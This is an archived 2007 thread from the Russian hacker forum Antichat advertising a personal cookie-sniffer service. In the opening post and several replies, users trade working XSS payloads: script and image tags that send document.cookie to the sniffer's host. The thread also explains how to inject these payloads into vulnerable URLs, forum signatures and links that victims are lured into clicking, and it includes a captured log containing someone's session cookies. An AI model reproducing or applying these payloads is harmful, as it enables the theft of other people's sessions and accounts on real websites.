Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Избранное (https://forum.antichat.xyz/forumdisplay.php?f=89)
-   -   Сниффер от netsec.ru (https://forum.antichat.xyz/showthread.php?t=36829)

GreenBear 31.03.2007 14:18

Сниффер от netsec.ru
 
На античате не работает, да и вообще в рунете не видел персональных - решил восстановить старый. На этот раз все будет тип-топ, т.к уже на своем серваке все :)

Как узнать адрес моего персонального сниффера?
Адрес вашего снифера – http://s.netsec.ru/Ваш_Логин.gif (Обратие внимание на регистр!)

Как им воспользоваться?
Простой вызов по ссылке:
Код HTML:

<a href="http://s.netsec.ru/mda.gif?test">click me</a>
Вызов как картинки:
Код HTML:

<img src="http://s.netsec.ru/mda.gif">
Вызов из скрипта:
Код HTML:

<script>img = new Image(); img.src = "http://s.netsec.ru/mda.gif?"+document.cookie;</script>
Обратите внимание на знак ? после mda.gif.

На сниффере есть ограничение – 5000 записей. Поэтому регулярно следите за забитостью аккуанта, иначе вы можете не получить новых записей.

Как применить? Читайте карту раздела статьи

Дал ссылку, поставил аватару, поставил как фон , а поле стринг пустое

Адрес – http://s.netsec.ru
Регистрация нового – http://s.netsec.ru/?act=reg

GreenBear 02.04.2007 12:07

Добавлен фильтр по ИП и хосту.

GreenBear 09.05.2007 15:15

После того как положили кое что на спамхаус, который грозился внести ИП сервера в блеки, но все равно внес хтя мы выполнили все их условия =) прикрутил домен назад, сниффер опять работает..

xaker-boss 13.05.2007 18:37

Чёт я неврубился как им пользоваться!? Как его запустить? и что надо вписать в Host или Ip?

TrON 13.05.2007 18:42

Цитата:

Сообщение от GreenBear
На античате не работает...

Да работает на античате, чета тя глючит чувак.

GreenBear 13.05.2007 19:39

Цитата:

Сообщение от motorola3653
Чёт я неврубился как им пользоваться!? Как его запустить? и что надо вписать в Host или Ip?

уверен, что он нужен тебе?

marshall4war 13.05.2007 20:51

TrON,
на античате он не работает уже чёрт знает сколько, там только log.php работает если я не прав, то ткни меня носом =)

GreenBear,
благодарю за скиффку, теперь сухо и тепло =)

TrON 13.05.2007 21:32

Цитата:

на античате он не работает уже чёрт знает сколько, там только log.php работает если я не прав, то ткни меня носом =)
Тыкаю тебя носом. надо мозгами немнога пошевелить и въехал бы...
Сам снифак
находится на http://OLD.antichat.ru/cgi-bin/s.jpg
а лог на http://old.antichat.ru/sniff/log.php
------------
в странице лог просто указан не тот адрес да и все.
Спокойно юзаю этот сниффер.

marshall4war 13.05.2007 22:06

Цитата:

Сообщение от TrON
Тыкаю тебя носом. надо мозгами немнога пошевелить и въехал бы...
Сам снифак
находится на http://OLD.antichat.ru/cgi-bin/s.jpg
а лог на http://old.antichat.ru/sniff/log.php
------------
в странице лог просто указан не тот адрес да и все.
Спокойно юзаю этот сниффер.

парень, тебе говорят не про этот сниффер, а про "личный" http://antichat.org/sniffer - про него тебе и говорю, что он не пашет.
А тот, что ты мне показал, можно конечно поюзать его, но я не хочу, ибо личный удобнее.
Понятно о чём речь идёт? Сначала сам мозгами пошевели ;)

blackybr 26.05.2007 12:47

https://forum.antichat.ru/showpost.php?p=347528&postcount=8 !

Цитата:

ВСЕ благодарности убедительная просьба выражать в репутацию.
!!!

freddi 22.06.2007 12:06

Время прилета кук отстает на 2 часа от системных часов.

GreenBear 22.06.2007 13:03

просто время эстонское ...

Пасстырь 24.06.2007 13:42

слушай,а куки где?у меня только вот что пришло
------------------
Time: 24.06 -10.58.39
IP: 83.234.212.36
Host:
Browser: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.8 (build 01709))
String:
---------------
что это мне может дать?что вообще может дать ай-пи?

Retscan 24.06.2007 18:33

Цитата:

слушай,а куки где?у меня только вот что пришло
похоже на то, что кто-то (может ты) просто запустил файл картинки. Или запрос составлен неверно.
У мну все форцает.

CarnoPhage 13.07.2007 20:49

Как проверить работает ли снифер если мои куки в найденной xss не улетают, или пустое окно или слова document.cookie ? Использую http://s.netsec.ru

~EviL~ 21.08.2007 18:23

Пацаны, ко мне куки вабще не приходят. Только IP, хост, и информация да и пустое поле String. Написал все как надо и добавил +document.cookie, только чего то их нет. :(

GreenBear 21.08.2007 19:04

ну у других работает же.
так что...

~EviL~ 22.08.2007 00:41

У меня не пашет :(

Apik 23.08.2007 08:01

Все пашет, надо в правильно виде ссылку давать. Например в ГТЧате может не пахать, т.к. там стоит редирект, соттвественно ты вылазишь неизвестно куда, а потом от этого неизвестно куда уже на сниф, соотв-но и не приходит ничего. Так по крайней мере у нас в чате.
Зато на форуме, внедренный в подпись куки шлет только так ))))

Perec333 08.09.2007 22:17

Подскажите плиз, почему на эту ссылку, на снифак приходят тока мои куки(xss в теме сообщения)
<script>img = new Image(); img.src = "http://s.netsec.ru/mda.gif?"+document.cookie;</script>
Р.S. мои сообщения читают там где я их шлю))

inlanger 09.09.2007 11:59

у меня вопрос...может он и немного глупый... можно тырить куки с предыдущей по хистори странице?

V1k 09.09.2007 14:54

нет, это нарушает политику безопасности браузера

xtra 10.09.2007 19:04

и всё же мог бы кто-нибудь привести пример действительно работающего запроса который выдирает куки? =)

GreenBear 10.09.2007 19:18

в первом посте есть.

inlanger 11.09.2007 11:11

А если юзать <frame>, куки с него не будут приходить?

KPOT111 26.09.2007 23:14

а можно как нить сделать, чтобы: отослать код со сниффером на мыло, и этот код сам срабатывал (когда открывают сообщение)?

если так можно сделать, скажите как плиз :)

n0153r 26.09.2007 23:24

Цитата:

Причина: Заместо этих букв должен быть текст, который объясняет почему этот сайт закрыт.
Но Green Bear лох и его не исправил.
Короче - закрыто.
P.S. Дизайнер - лох (с) Лебедев
P.S.S. Лебедев самовлюбленный дурак (c) Green Bear
P.S.S.S. Я не люблю чаты, поэтому не буду отвечать, Мудак. (c) Лебедев
P.S.S.S.S. Заебал. (с) Green Bear

Всё, идите воровать. (c) Админ
А что с сайтом случилось ?
Будет ли он работать снова ?

Darkweider 26.09.2007 23:24

кто-то дефейснул чтоли сайт??? там про Green Bear'a написано что-то....

GreenBear 27.09.2007 01:41

сниффер работает.. и будет работать.
сайт уже наверно год не работает..

KPOT111 27.09.2007 10:39

народ, скажите плиз, желательно подробнее и с объяснениями - как добавить скрипт в картинку, чтобы потом при загрузке картинки, скрипт автоматически срабатывал и отсылал куки снифферу.

заранее огрромное спасибо, и про плюсик не забуду :)

inlanger 27.09.2007 12:45

Ты ПХП знаешь? Если да, то придумай сам. Если нет - пиши в личку или асю.

Tukoitsr 26.11.2007 18:40

укажи ссылку к сниферу.
Типо так:
ссылка (ведет к снифферу)
Чел нажимает и куки твои))

Tukoitsr 26.11.2007 18:43

все норм снифф работает.
А прелесть в том что лог запаролен и у каждого свой))

NilsonUA 26.11.2007 20:08

http://s.netsec.ru/max_26_rus.gif

GreenBear 26.11.2007 20:39

Цитата:

3-12 символов (латинские буквы и цифры)
....

GreenBear 26.11.2007 23:08

этому видео 100 лет завтра.. не работает бага уже давно.

TriViaL 29.11.2007 22:07

Народ помогите пожалуйста как правильно написать запрос со сниффером netsec.ru чтоб срабатывал при наведении мыши или как нибудь еще, если не фильтруется тег [googlevideo]

Tukoitsr 30.11.2007 20:19

Цитата:

Сообщение от Max_26_rus
А ещё как то можно взломать форум на fastbb? Научите пожалуйста!

Ищи XSS в форуме. Потом юзай свой сниффер.
Например ты нашел XSS в www.site.com/search=И здесь сниффер. То есть:
www.site.com/search=<script>img = new Image(); img.src = "http://s.netsec.ru/LOGIN?"+document.cookie;</script>
У мну все работает.
Расшифровывать в опере или в мозиле при помощи cookie editor

Taurus0688 07.12.2007 01:32

Прости те меня за тупой вопрос!Мне вот на снифер s.netsec.ru пришла вот такая вот хрень объясните по подробней что это

Time: 15.11 -09.28.27
IP: ***********
Host: http://cc.msnscache.com/cache.aspx?q=72332686331307&mkt=uk-UA&lang=uk-UA&w=30882ad3&FORM=CVRE2
Browser: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)
String:

Код:

__utma=211301639.258014850.1182155382.1194284788.1194771843.23; __utmz=211301639.1194771843.23.25.utmccn=(organic)|utmcsr=msn|utmctr=Анімації|utmcmd=organic; style=null; ban=3; scook=1193180954; re_ret=0; rating_km_ua=2037; USERID=50533448; crVct=5; s_lastvisit=1193853435156; LyRatings=|

Tigger 07.12.2007 15:32

Скажите пожалуиста...а как наити xss в воруме каком-нибудь?


Время: 09:53